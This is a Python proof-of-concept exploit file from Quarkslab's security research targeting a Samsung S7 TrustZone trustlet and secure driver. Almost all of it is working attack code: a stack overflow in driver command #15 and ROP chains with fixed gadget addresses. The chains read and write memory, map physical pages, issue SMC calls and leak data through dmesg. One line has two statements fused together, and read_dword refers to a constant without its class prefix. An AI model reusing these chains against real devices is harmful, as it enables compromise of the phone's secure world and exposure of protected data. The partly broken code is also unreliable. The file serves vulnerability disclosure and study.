# secdriver.py: Proof of concept exploit for Samsung S7 trustlet.
# Copyright (C) 2019-2020 Quarkslab SAS.
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/
#
#
#
from .trustlet import *

from mcclient import *


TCI_TL_BUFFER_ADDRESS = 0x100000
TCI_DR_BUFFER_ADDRESS = 0x300000

MAP_READABLE = 1 << 0
MAP_WRITABLE = 1 << 1
MAP_EXECUTABLE = 1 << 2
MAP_UNCACHED = 1 << 3
MAP_IO = 1 << 4
MAP_HARDWARE = MAP_READABLE | MAP_WRITABLE | MAP_IO
MAP_NOT_SECURE = 1 << 7
MAP_ALLOW_NONSECURE = 1 << 7
MAP_STRONGLY_ORDERED = 1 << 8


class SecDriverInterface(object):

    DRIVER_ID = 0x40002
    DRIVER_RETVAL_ADDRESS = TCI_TL_BUFFER_ADDRESS + 0x80
    DRIVER_PAYLOAD_OFFSET = 0x200
    DRIVER_PAYLOAD_ADDRESS = TCI_TL_BUFFER_ADDRESS + DRIVER_PAYLOAD_OFFSET

    def __enter__(self):
        # TODO: check if the driver is loaded and load it if needed
        return self

    def __exit__(self, *args):
        pass

    def __init__(self, tl_if):
        self._tl_if = tl_if

    @property
    def tci(self):
        return self._tl_if._tci

    def execute_code(self, *payloads):
        """
        Driver payload exploiting the stack buffer overflow in the command
        #15 using the ropchains passed in the `payloads` argument.
        """
        payload_chunk = [
            0xf,  # Vulnerable command ID
            0x0,
            # Address of the buffer mapped from the trustlet into the driver
            # address space
            TCI_TL_BUFFER_ADDRESS + self.DRIVER_PAYLOAD_OFFSET + 0x100,
        ]
        self.tci.seek(self.DRIVER_PAYLOAD_OFFSET)
        for dword in payload_chunk:
            self.tci.write_dword(dword)
        # ---------------------------------------------------------------------
        payload_chunk = [
            0x508   # Maximum size of the payload.
                    # Could be extended by reversing the cause of the crash.
                    # Hopefully it should be enough in most cases.
        ]
        self.tci.seek(self.DRIVER_PAYLOAD_OFFSET + 0x300)
        for dword in payload_chunk:
            self.tci.write_dword(dword)
        # ---------------------------------------------------------------------
        # If a valid address is not written here, the driver crashes.
        # Copying 0xcf17 is a quickfix that should be removed once the cause
        # of the crash is known.
        self.tci.seek(self.DRIVER_PAYLOAD_OFFSET + 0x320)
        for i in range(7):
            self.tci.write_dword(0xcf17)
        # ---------------------------------------------------------------------
        self.tci.seek(self.DRIVER_PAYLOAD_OFFSET + 0x33c)
        for ropchain in payloads:
            for gadget in ropchain:
                self.tci.write_dword(gadget)
        # ---------------------------------------------------------------------
        self.tci.seek(0x0)
        self._tl_if.execute_code(
            TrustletPayload.call_driver(
                self.DRIVER_ID,
                self.DRIVER_PAYLOAD_ADDRESS,
                self.DRIVER_RETVAL_ADDRESS
            ),
            TrustletPayload.call_notify_and_wait()
        )


class SecDriverPayload(object):

    @staticmethod
    def leak_dword_dmesg(addr, ropchain=[]):
        """
        Payload leaking a dword in the driver address space using a debug
        string displayed in dmesg.
        """
        # Return address
        ropchain += [0x07d07d4b]

        # 0x07d07d4a (0x07d07d4b): pop {r4, pc};
        ropchain += [addr]
        ropchain += [0xcff1]

        return ropchain

    @staticmethod
    def call_notify_and_wait():
        """
        Payload that resets the state of the driver in case we want to reexploit
        it.
        """
        ropchain = []

        # Return address
        ropchain += [0x000138c9]

        # 0x000138c8 (0x000138c9): pop {r4, r7, pc};
        ropchain += [0x24374 - 0xc]  # Value of R4 set by the driver
        ropchain += [0x2]            # Value of R7 set by the driver
        # ropchain += [0xC6CB]
        ropchain += [0xC683]

        return ropchain    @staticmethod
    def read_dword(addr):
        """
        Payload that reads a dword in memory
        """
        ropchain = []

        # Return address
        ropchain += [0x00011cf5]

        # 0x00011cf4 (0x00011cf5): pop {r5, pc};
        ropchain += [addr]
        ropchain += [0x00001edd]

        # 0x00001edc (0x00001edd): ldr r0, [r5]; pop {r3, r4, r5, r6, r7, pc};
        ropchain += [0xdeadbeef]
        ropchain += [DRIVER_RETVAL_ADDRESS]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0x07d0244d]

        # 0x07d0244c (0x07d0244d): str r0, [r4]; pop {r4, pc};
        ropchain += [0xdeadbeef]

        return ropchain

    @staticmethod
    def write_dword(addr, value):
        """
        Payload that writes a dword in memory
        """
        ropchain = []

        # Return address
        ropchain += [0x00009a65]

        # 0x00009a64 (0x00009a65): pop {r0, r4, r5, pc};
        ropchain += [value]
        ropchain += [addr]
        ropchain += [0xdeadbeef]
        ropchain += [0x07d0244d]

        # 0x07d0244c (0x07d0244d): str r0, [r4]; pop {r4, pc};
        ropchain += [0xdeadbeef]

        return ropchain

    @staticmethod
    def memcpy(dst_addr, src_addr, length):
        """
        Payload using memcpy to read memory parts in the driver's
        address space.
        """
        ropchain = []

        # Return address
        ropchain += [0x07d069e5]

        # 0x07d069e4 (0x07d069e5): pop {r0, r1, r2, r3, pc};
        ropchain += [0x1b160]  # R0 = memcpy
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0x07d01013]

        # 0x07d01012 (0x07d01013): mov r12, r0; pop.w {r0-r4, lr}; bx r12;
        ropchain += [dst_addr]
        ropchain += [src_addr]
        ropchain += [length]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]

        return ropchain

    @staticmethod
    def svc_mmap(physical_addr_low, virtual_addr, length, attr=0x83):
        """
        Payload using the SVC MMap (#7) to map physical pages in the
        driver's address space.
        """
        length = (length >> 0xc) << 0xc
        virtual_addr = (virtual_addr >> 0xc) << 0xc
        physical_addr_low = (physical_addr_low >> 0xc) << 0xc
        ropchain = []

        # Return address
        ropchain += [0x07d069e5]

        # 0x07d069e4 (0x07d069e5): pop {r0, r1, r2, r3, pc};
        ropchain += [attr << 0x10]              # Memory mapping attributes
        ropchain += [virtual_addr]              # Virtual Address Start
        ropchain += [virtual_addr + length]     # Virtual Address End
        ropchain += [physical_addr_low]         # Physical Address Low
        ropchain += [0x07d07d4b]

        # 0x07d07d4a (0x07d07d4b): pop {r4, pc};
        ropchain += [0]                         # Physical Address High
        ropchain += [0x07d09Ed5]

        # 0x07d09Ed4 (0x07d09Ed5): svc 0x7; pop {r2-r12, lr};
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]

        return ropchain

    @staticmethod
    def svc_munmap(virtual_addr, length):
        """
        Payload using the SVC MUnmap (#8) to unmap physical pages in the
        driver's address space.
        """
        length = (length >> 0xc) << 0xc
        virtual_addr = (virtual_addr >> 0xc) << 0xc
        ropchain = []

        # Return address
        ropchain += [0x07d069e5]

        # 0x07d069e4 (0x07d069e5): pop {r0, r1, r2, r3, pc};
        ropchain += [0]
        ropchain += [virtual_addr]              # Virtual Address Start
        ropchain += [virtual_addr + length]     # Virtual Address End
        ropchain += [0]
        ropchain += [0x07D09F81]

        # 0x07D09F80 (0x07D09F81): svc 0x8; pop {r2-r8, lr};
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]

        return ropchain
    
    @staticmethod
    def svc_smc(registers_address):
        """
        Payload using a drApi functions wrapping a call to the SVC SMC (0x1B).
        """
        ropchain = []

        # Return address
        ropchain += [0x07d069e5]

        # 0x07d069e4 (0x07d069e5): pop {r0, r1, r2, r3, pc};
        ropchain += [0x07D0A739]  # R0 = drApiSMC
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0x07d01013]

        # 0x07d01012 (0x07d01013): mov r12, r0; pop.w {r0-r4, lr}; bx r12;
        ropchain += [0xdeadbeef]
        ropchain += [registers_address]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]
        ropchain += [0xdeadbeef]

        return ropchain


def main():
    dr_output_length = 0x1000
    dr_payload_offset = 0x1000
    dr_output_offset = 0x1000

    with TrustletInterface() as tl_if:
        with SecDriverInterface(tl_if) as dr_if:
            dr_if.execute_code(
                SecDriverPayload.svc_mmap(
                    physical_addr_low=0xfe51a000,
                    virtual_addr=0x40000,
                    length=0x1000,
                    attr=0x103,
                ),
                SecDriverPayload.leak_dword_dmesg(0x40000)
            )


if __name__ == "__main__":
    main()
